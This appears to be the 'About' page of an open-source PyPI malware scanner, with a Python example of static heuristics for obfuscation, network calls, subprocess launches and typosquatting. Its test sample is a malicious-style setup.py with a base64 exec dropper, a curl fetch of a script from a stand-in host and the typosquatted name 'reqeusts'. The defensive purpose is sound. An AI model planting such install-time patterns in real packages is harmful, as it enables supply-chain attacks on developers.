About PyPI Security Scanner
PyPI Security Scanner is an automated, open-source service that helps secure the Python package ecosystem by running malware analysis and an engineering assessment on every new package release published to PyPI, in near real time.
Our Mission
Open-source registries are increasingly targeted by supply chain attacks: typosquatted package names, malicious install scripts, and credential stealers hidden in otherwise ordinary packages. PyPI Security Scanner continuously monitors the official PyPI package index and feeds each new release into a serverless scanning pipeline. By combining static threat heuristics with an AI review stage, it publishes transparent security scores and alerts developers as soon as a suspicious release appears.
How It Works
- Continuous Crawling: A background worker polls the PyPI RSS feed for new releases every 15 minutes.
- Static Threat Heuristics: Wheels and setup files (setup.py and other install-time code) are analysed for obfuscated payloads, outbound network calls, subprocess launches, and package names within a small Levenshtein distance of popular packages (typosquatting).
- Multi-stage AI Evaluation: Packages the heuristics rate as high risk are passed through reasoning workflows on Featherless API models, which confirm or dismiss each heuristic alert before a verdict is published.
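The static heuristics above, as an added Python example that is not the project's own scanner code: it walks the AST of a setup.py, flags base64-looking string literals and exec()/eval() fed by a decode call as obfuscation, flags imports of network modules and calls that launch subprocesses, pulls the declared name out of the setup() call, and compares that name against a list of popular packages using Levenshtein distance. The popular-package list, the 40-character base64 threshold, the score weights and the sample setup.py are all constructed for this example and are assumptions, not the project's real rules.

```python
import ast
import re
from dataclasses import dataclass, field

# Constructed list of high-download names a typosquatter might imitate (assumption).
POPULAR_PACKAGES = ["requests", "urllib3", "numpy", "pandas", "setuptools", "cryptography"]
# Module names whose import suggests outbound network activity (assumed list).
NETWORK_MODULES = {"socket", "urllib", "requests", "httpx", "http.client"}
SUBPROCESS_CALLS = {"subprocess.Popen", "subprocess.run", "subprocess.call",
                    "subprocess.check_output", "os.system", "os.popen"}
DECODE_CALLS = {"base64.b64decode", "base64.b85decode", "zlib.decompress", "marshal.loads"}
# A long unbroken run of base64 alphabet is a cheap obfuscation signal (40 is an assumed cutoff).
B64_LITERAL = re.compile(r"^[A-Za-z0-9+/]{40,}={0,2}$")


@dataclass
class Findings:
    obfuscation: list = field(default_factory=list)  # (lineno, detail)
    network: list = field(default_factory=list)
    subprocess: list = field(default_factory=list)


def _dotted_name(node):
    """Return 'pkg.attr' for a Name/Attribute chain, else None."""
    parts = []
    while isinstance(node, ast.Attribute):
        parts.append(node.attr)
        node = node.value
    if isinstance(node, ast.Name):
        parts.append(node.id)
        return ".".join(reversed(parts))
    return None


def _is_network_module(mod):
    return mod in NETWORK_MODULES or mod.split(".")[0] in NETWORK_MODULES


def scan_source(source):
    """Collect (lineno, detail) findings for each heuristic class, sorted by line."""
    f = Findings()
    for node in ast.walk(ast.parse(source)):
        if isinstance(node, ast.Import):
            for alias in node.names:
                if _is_network_module(alias.name):
                    f.network.append((node.lineno, alias.name))
        elif isinstance(node, ast.ImportFrom):
            if _is_network_module(node.module or ""):
                f.network.append((node.lineno, node.module))
        elif isinstance(node, ast.Call):
            name = _dotted_name(node.func)
            if name in SUBPROCESS_CALLS:
                f.subprocess.append((node.lineno, name))
            elif name in ("exec", "eval"):
                # exec()/eval() fed directly by a decode call is the classic dropper shape.
                arg = node.args[0] if node.args else None
                inner = _dotted_name(arg.func) if isinstance(arg, ast.Call) else None
                tag = "decoded" if inner in DECODE_CALLS else "dynamic"
                f.obfuscation.append((node.lineno, f"{name}({inner or '...'}) [{tag}]"))
        elif isinstance(node, ast.Constant) and isinstance(node.value, str):
            if B64_LITERAL.match(node.value):
                f.obfuscation.append((node.lineno, f"base64-like literal, {len(node.value)} chars"))
    for lst in (f.obfuscation, f.network, f.subprocess):
        lst.sort()
    return f


def declared_name(source):
    """Return the literal name= passed to setup(), or None."""
    for node in ast.walk(ast.parse(source)):
        if isinstance(node, ast.Call) and _dotted_name(node.func) in ("setup", "setuptools.setup"):
            for kw in node.keywords:
                if kw.arg == "name" and isinstance(kw.value, ast.Constant):
                    return kw.value.value
    return None


def levenshtein(a, b):
    """Plain Wagner-Fischer edit distance (insert, delete, substitute each cost 1)."""
    prev = list(range(len(b) + 1))
    for i, ca in enumerate(a, 1):
        cur = [i]
        for j, cb in enumerate(b, 1):
            cur.append(min(prev[j] + 1, cur[j - 1] + 1, prev[j - 1] + (ca != cb)))
        prev = cur
    return prev[-1]


def typosquat_candidates(name, popular=POPULAR_PACKAGES, max_distance=2):
    """Popular names within max_distance edits of the PEP 503-normalised name."""
    norm = re.sub(r"[-_.]+", "-", name).lower()
    hits = [(p, levenshtein(norm, p)) for p in popular]
    return [(p, d) for p, d in hits if 0 < d <= max_distance]


def risk_score(findings, squats):
    """Assumed weights giving a 0-100 score; obfuscation carries the most weight."""
    score = (40 * bool(findings.obfuscation) + 20 * bool(findings.network)
             + 20 * bool(findings.subprocess) + 20 * bool(squats))
    return min(score, 100)


def assess(source):
    f = scan_source(source)
    name = declared_name(source)
    squats = typosquat_candidates(name) if name else []
    return {"name": name, "findings": f, "typosquat": squats, "score": risk_score(f, squats)}


# Constructed sample setup.py; the base64 text is an inert stand-in and is never executed.
SAMPLE_SETUP = '''
import base64, subprocess
from urllib.request import urlopen
from setuptools import setup

PAYLOAD = "aW1wb3J0IG9zOyBvcy5zeXN0ZW0oJ2VjaG8gaGknKQ=="
exec(base64.b64decode(PAYLOAD))
subprocess.run(["curl", "http://example.invalid/x.sh"])
setup(name="reqeusts", version="0.0.1")
'''

if __name__ == "__main__":
    result = assess(SAMPLE_SETUP)
    print(result["name"], result["score"], result["typosquat"])
    for kind in ("obfuscation", "network", "subprocess"):
        for lineno, detail in getattr(result["findings"], kind):
            print(f"  {kind:12} line {lineno}: {detail}")
```

The AST walk deliberately ignores strings that merely contain a URL and only reports exec()/eval(); a real scanner would also resolve aliases such as `from os import system` and look inside `cmdclass` hooks, which this example does not.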
Technology Stack
The platform runs on a globally distributed, serverless architecture built from:
- Cloudflare Workers: Scalable serverless functions that run the feed ingestion and scan-trigger logic.
- Cloudflare D1 Database: SQL storage for scan status, package metadata and metrics, and final verdicts.
- Cloudflare Pages: Hosts the web front end, with Pages Functions rendering dynamic pages server-side.
Open Source License
PyPI Security Scanner is open-source software licensed under the terms of the MIT License. Developers and researchers are welcome to review the code, build on the scanner engine, or deploy customised instances of the system.